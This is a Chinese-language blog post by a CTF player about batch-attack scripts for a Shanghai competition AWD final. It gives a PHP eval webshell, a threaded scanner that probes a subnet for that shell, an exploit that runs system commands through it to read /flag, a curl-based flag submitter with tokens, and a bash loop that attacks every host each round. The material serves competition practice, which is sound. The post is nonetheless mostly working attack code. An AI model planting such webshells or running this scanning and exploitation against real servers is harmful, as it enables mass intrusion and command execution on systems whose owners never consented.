awd
的批量攻击一直都在看pwn
,web
准备过几个脚本但还没实践过,这次上海市赛决赛现场调了一下批量攻击一句话木马的脚本,也是在现场废了不少时间…拿pwn
的脚本改的,感觉web
手的脚本会比我的简洁欸,凑合看
扫描ip
一句话木马在文件在/assets/scripts/pass.php
,内容如下:
<?php @eval($_POST['pass']);?>
在获取hosts
的时候需要将url
中的格式修改成木马文件的路径,init_hosts.py
脚本如下
import requests
import threading
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def check_ip(i):
try:
url = f'http://10.103.{i}.1/assets/scripts/pass.php'
response = requests.get(url, timeout=0.5)
if response.status_code == 200:
li('[+] ' + url)
with open('hosts', 'a+') as f:
f.write(f'http://10.103.{i}.1/assets/scripts/pass.php\n')
else:
raise Exception("Not 200 OK")
except Exception as e:
ll('[-] ' + url)
with open('h', 'a+') as f:
f.write(f'http://10.103.{i}.1/assets/scripts/pass.php\n')
NUM_THREADS = 256
threads = []
for i in range(1, 256):
thread = threading.Thread(target=check_ip, args=(i,))
threads.append(thread)
thread.start()
if len(threads) >= NUM_THREADS:
for t in threads:
t.join()
threads = []
for t in threads:
t.join()
攻击脚本
需要修改data
中的连接密码,例如本题是pass
,exp.py
代码如下
import requests
import os
import sys
from time import sleep
from pwn import *
def write_to_flags(d):
fd = open('./flags', 'ab')
fd.write(d + b'\n')
fd.close()
url = sys.argv[1]
print(url)
data = {
"pass": "system('cat /flag');"
}
response = requests.post(url=url, data=data)
if response.status_code == 200:
flag = response.text.strip()
print(flag)
write_to_flags(flag.encode())
print("Flag 已写入到 flags 文件中。")
else:
print("获取 flag 失败:", response.status_code)
批量提交flag脚本
url
格式也搞了好一会…得重学python
了唉。submit_flag.py
脚本如下:
import threading
from time import sleep
import os
import json
import requests
flag_file = './flags'
threads = []
def submit(flag):
try:
# url = 'https://ctf.bugku.com/awd/submit.html?token=88b02ce3b420ec1f4b4a2e02dd6fe305&flag=' + flag[:-1]
#url = f"curl -X POST http://27.25.152.77:19999/api/flag -H 'Authorization: 7f120ca9b0e3024d06734a04a986cc55' -d '{{ \"flag\": \"{flag[:-1]}\"}}'"
url = "curl -k -H \"Content-Type:application/json\" -X POST -d '{\"token\": \"0c9651851218f216253a2b0d84d24cfd\", \"flag\":\""
url += flag[:-1]
url += "\", \"pk\":\"be7e7b26c6a5235bcedc8531d6bfd648\"}\' \'https://10.10.26.231/api/awd/batch_flag/\'"
print(url)
# r = requests.get(url)
os.system(url)
print('\x1b[01;38;5;214m[+] pwned!\x1b[0m')
except Exception as e:
print('\x1b[01;38;5;214m[-] connect fail: {}\x1b[0m'.format(str(e)))
def main():
with open(flag_file) as flag_txt:
flags = flag_txt.readlines()
for flag in flags:
thread = threading.Thread(target=submit, args=(flag,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if __name__ == "__main__":
main()
批量攻击脚本
批量攻击脚本attack.sh
如下
#! /bin/bash
attack_times=10000
round_wait_time=30 # 20 min
wait_submit_time=5 # 20 s
log_file="logs"
run_time=120 #timeout
next_attack_time=2.5 #half time
max_concurrent_attacks=10 # Max number of concurrent attacks
log(){
t=$(date "+%H:%M:%S")
m="[$t]$1" # Fixed missing parameter usage
info="\033[43;37m $m \033[0m"
echo -e "$info"
echo -e "$m" >> $log_file
}
attack() {
echo "-- round $1 -- " >> all_flags
cat flags >> all_flags
rm flags
local jobs=0
for line in $(cat hosts); do
timeout --foreground $run_time python3 ./exp.py "$line" &
sleep $next_attack_time
((jobs++))
if [ "$jobs" -ge "$max_concurrent_attacks" ]; then
wait # Wait for all background jobs to finish
jobs=0
fi
done
wait # Ensure all attacks are complete before moving on
echo -e "\x1b[47;30m Waiting $wait_submit_time s to submit flag\x1b[0m"
sleep $wait_submit_time
echo -e "\x1b[47;30m Submitting flag\x1b[0m"
python3 ./submit_flag.py
}
for ((i=1; i <= attack_times; i++)); do
m="-------- round $i --------"
log "$m"
attack $i
echo -e "\x1b[47;30m Waiting next round\x1b[0m"
sleep $round_wait_time
done